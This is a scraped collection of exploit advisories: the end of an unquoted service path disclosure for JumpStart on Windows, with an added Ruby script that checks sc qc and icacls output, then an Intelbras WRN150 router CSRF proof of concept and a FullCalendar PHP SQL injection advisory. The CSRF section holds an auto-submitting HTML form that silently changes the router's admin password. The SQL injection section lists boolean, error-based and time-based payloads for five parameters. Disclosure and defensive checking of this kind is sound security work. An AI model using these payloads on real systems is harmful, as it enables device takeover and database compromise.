# Software Link: https://www.inforprograma.net/
# Version: = 0.6.0.0 wpspin.exe
# Tested on: Windows 10 Home
# CVE : N/A

###############STEPS##########################

# 1.- Install the JumpStart application on the Windows 10 Home operating system.
# 2.- Open the Command Prompt.
# 3.- Execute the command: wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
# 4.- The following will appear in the list: JumpStart Push-Button Service jswpbapi C:\Program Files (x86)\Jumpstart\jswpbapi.exe
# 5.- We proceed to verify the directory permissions using the icacls command, which shows the protection of the directory as below:

NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administradores:(I)(F)
BUILTIN\Usuarios:(I)(RX)
ENTIDAD DE PAQUETES DE APLICACIONES\TODOS LOS PAQUETES DE APLICACIONES:(I)(RX)
ENTIDAD DE PAQUETES DE APLICACIONES\TODOS LOS PAQUETES DE APLICACIÓN RESTRINGIDOS:(I)(RX)

# 6.- Finally, using the command sc qc jswpbapi we check the service configuration and observe that it allows privilege escalation,
# since the binary path contains spaces without being quoted, CONTROL_ERROR (error control) is NORMAL and NOMBRE_INICIO_SERVICIO (service start name)
# is LocalSystem, as shown in the following output:

[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: jswpbapi
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Jumpstart\jswpbapi.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : JumpStart Push-Button Service
DEPENDENCIAS : RPCSS
NOMBRE_INICIO_SERVICIO: LocalSystem
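Added auditor's example (not part of the advisory): it applies the checks of steps 5 and 6 to captured `sc qc` and `icacls` output instead of reading them by eye, matching the field labels in both English and the Spanish shown above. The sample texts are constructed from the advisory's output, the icacls lines are assumed to be in the "principal:(flags)" form shown, and the function names are this example's own.

```ruby
# Added example, not code from the advisory. Sample inputs are constructed
# from the advisory output; a Spanish-locale `sc qc` and an icacls listing.
SC_QC_SAMPLE = <<~'OUT'
  NOMBRE_SERVICIO: jswpbapi
  TIPO : 10 WIN32_OWN_PROCESS
  TIPO_INICIO : 2 AUTO_START
  NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Jumpstart\jswpbapi.exe
  NOMBRE_MOSTRAR : JumpStart Push-Button Service
  NOMBRE_INICIO_SERVICIO: LocalSystem
OUT

ICACLS_SAMPLE = <<~'OUT'
  NT AUTHORITY\SYSTEM:(I)(F)
  BUILTIN\Administradores:(I)(F)
  BUILTIN\Usuarios:(I)(RX)
OUT

# Pull a labelled value out of `sc qc` output; `labels` lists the English and
# localized spellings of the field (assumption: one "LABEL : value" per line).
def sc_field(sc_output, *labels)
  m = sc_output.match(/^\s*(?:#{labels.join('|')})\s*:\s*(.+?)\s*$/)
  m && m[1]
end

def service_name(sc_output)
  sc_field(sc_output, 'SERVICE_NAME', 'NOMBRE_SERVICIO')
end

def binary_path(sc_output)
  sc_field(sc_output, 'BINARY_PATH_NAME', 'NOMBRE_RUTA_BINARIO')
end

def runs_as_local_system?(sc_output)
  sc_field(sc_output, 'SERVICE_START_NAME', 'NOMBRE_INICIO_SERVICIO') == 'LocalSystem'
end

# The weakness itself: a path that is not wrapped in quotes and contains a
# space, so the service control manager resolves it ambiguously.
def unquoted_with_spaces?(path)
  !path.nil? && !path.start_with?('"') && path.include?(' ')
end

# Remediation: rewrite the service's binary path with embedded quotes.
def quoted_binpath_fix(name, path)
  %(sc config #{name} binPath= "\\"#{path}\\"")
end

# icacls: does any principal other than SYSTEM, Administrators or
# TrustedInstaller hold Full (F), Modify (M), Write (W), or the specific
# create-file / create-subdirectory rights (WD, AD)? Inheritance flags such
# as (I), (OI), (CI) are ignored.
PRIVILEGED = /\\(SYSTEM|Administrators|Administradores|TrustedInstaller)\z/i

def writable_by_unprivileged?(icacls_output)
  icacls_output.each_line.any? do |line|
    m = line.strip.match(/\A(.+?):((?:\([^)]*\))+)\z/)
    next false unless m && m[1] !~ PRIVILEGED
    m[2].scan(/\(([^)]*)\)/).flatten.any? do |grant|
      %w[F M W].include?(grant) || (grant.split(',') & %w[WD AD]).any?
    end
  end
end

# Overall finding for one service, combining steps 5 and 6; nil when the
# binary path is quoted or has no spaces.
def unquoted_service_path_finding(sc_output, icacls_output)
  path = binary_path(sc_output)
  return nil unless unquoted_with_spaces?(path)
  name = service_name(sc_output)
  {
    service: name,
    path: path,
    runs_as_system: runs_as_local_system?(sc_output),
    dir_writable_by_users: writable_by_unprivileged?(icacls_output),
    fix: quoted_binpath_fix(name, path)
  }
end
```

On the advisory's own icacls listing, `dir_writable_by_users` is false: BUILTIN\Usuarios only has (RX), so the finding is an unquoted path running as LocalSystem whose directory is not writable by standard users.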

Intelbras Router WRN150 1.0.18 Cross Site Request Forgery


Intelbras Router WRN150 version 1.0.18 suffers from a cross site request forgery vulnerability.


MD5 | 2a5c4c0eaebca5ec2517e60d7b939fe8

Exploit Title: Intelbras Router WRN150 1.0.18 - Cross-Site Request Forgery
Date: 2019-10-25
Exploit Author: Prof. Joas Antonio
Vendor Homepage: https://www.intelbras.com/pt-br/
Software Link: http://en.intelbras.com.br/node/25896
Version: 1.0.18
Tested on: Windows
CVE : N/A

####################
# PoC1: https://www.youtube.com/watch?v=V188HHDMbGM&feature=youtu.be

<html>
<body>
<form action="http://10.0.0.1/goform/SysToolChangePwd" method="POST">
<input type="hidden" name="GO" value="system_password.asp">
<input type="hidden" name="SYSPSC" value="0">
<input class="text" type="password" name="SYSOPS" value="hack123"/>
<input class="text" type="password" name="SYSPS" value="mrrobot"/>
<input class="text" type="password" name="SYSPS2" value="mrrobot"/>
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

waldronmatt FullCalendar-BS4-PHP-MySQL-JSON 1.21 SQL Injection


waldronmatt FullCalendar-BS4-PHP-MySQL-JSON version 1.21 suffers from a remote SQL injection vulnerability.


MD5 | 83962e607813e599acbec494542b97c0

Exploit Title: waldronmatt FullCalendar-BS4-PHP-MySQL-JSON 1.21 - 'start' SQL Injection
Date: 2019-10-28
Exploit Author: Cakes
Vendor Homepage: waldronmatt/FullCalendar-BS4-PHP-MySQL-JSON
Software Link: https://github.com/waldronmatt/FullCalendar-BS4-PHP-MySQL-JSON.git
Version: 1.21
Tested on: CentOS7
CVE : N/A

# PoC: Multiple SQL Injection vulnerabilities

Parameter: start (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: title=Test&description=Test&color=#0071c5&start=2019-01-23 00:00:00' RLIKE (SELECT (CASE WHEN (3201=3201) THEN 0x323031392d30312d32332030303a30303a3030 ELSE 0x28 END)) AND 'ScZt'='ScZt&end=2019-01-24 00:00:00
Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: title=Test&description=Test&color=#0071c5&start=2019-01-23 00:00:00' AND (SELECT 6693 FROM(SELECT COUNT(*),CONCAT(0x71626b6a71,(SELECT (ELT(6693=6693,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'oFHi'='oFHi&end=2019-01-24 00:00:00
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: title=Test&description=Test&color=#0071c5&start=2019-01-23 00:00:00' AND (SELECT 6752 FROM (SELECT(SLEEP(5)))ImfQ) AND 'EAnH'='EAnH&end=2019-01-24 00:00:00
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

Parameter: end (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: title=Test&description=Test&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00' RLIKE (SELECT (CASE WHEN (4825=4825) THEN 0x323031392d30312d32342030303a30303a3030 ELSE 0x28 END)) AND 'xqhi'='xqhi
Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: title=Test&description=Test&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00' AND (SELECT 4638 FROM(SELECT COUNT(*),CONCAT(0x71626b6a71,(SELECT (ELT(4638=4638,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OvvR'='OvvR
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: title=Test&description=Test&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00' AND (SELECT 6750 FROM (SELECT(SLEEP(5)))gPYF) AND 'Xhni'='Xhni
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

Parameter: title (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: title=Test'||(SELECT 0x68506d50 FROM DUAL WHERE 9657=9657 AND 5501=5501)||'&description=Test&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00
Vector: AND [INFERENCE]

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: title=Test'||(SELECT 0x684f4b6d FROM DUAL WHERE 1515=1515 AND (SELECT 6271 FROM(SELECT COUNT(*),CONCAT(0x71626b6a71,(SELECT (ELT(6271=6271,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&description=Test&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: title=Test'||(SELECT 0x72417477 FROM DUAL WHERE 3543=3543 AND (SELECT 4482 FROM (SELECT(SLEEP(5)))AnGw))||'&description=Test&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

Parameter: description (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: title=Test&description=Test'||(SELECT 0x7570456a FROM DUAL WHERE 7753=7753 AND 5528=5528)||'&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00
Vector: AND [INFERENCE]

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: title=Test&description=Test'||(SELECT 0x4f6d6f41 FROM DUAL WHERE 6915=6915 AND (SELECT 9677 FROM(SELECT COUNT(*),CONCAT(0x71626b6a71,(SELECT (ELT(9677=9677,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: title=Test&description=Test'||(SELECT 0x6a424e63 FROM DUAL WHERE 6961=6961 AND (SELECT 9467 FROM (SELECT(SLEEP(5)))jHfq))||'&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

Parameter: color (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: title=Test&description=Test&color=#0071c5' RLIKE (SELECT (CASE WHEN (2320=2320) THEN 0x23303037316335 ELSE 0x28 END)) AND 'XfIW'='XfIW&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00
Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))

Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: title=Test&description=Test&color=#0071c5' OR (SELECT 2035 FROM(SELECT COUNT(*),CONCAT(0x71626b6a71,(SELECT (ELT(2035=2035,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'nWLO'='nWLO&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00
Vector: OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

Type: time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
Payload: title=Test&description=Test&color=#0071c5' OR (SELECT 7165 FROM (SELECT(SLEEP(5)))kngP) AND 'oklj'='oklj&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00
Vector: OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
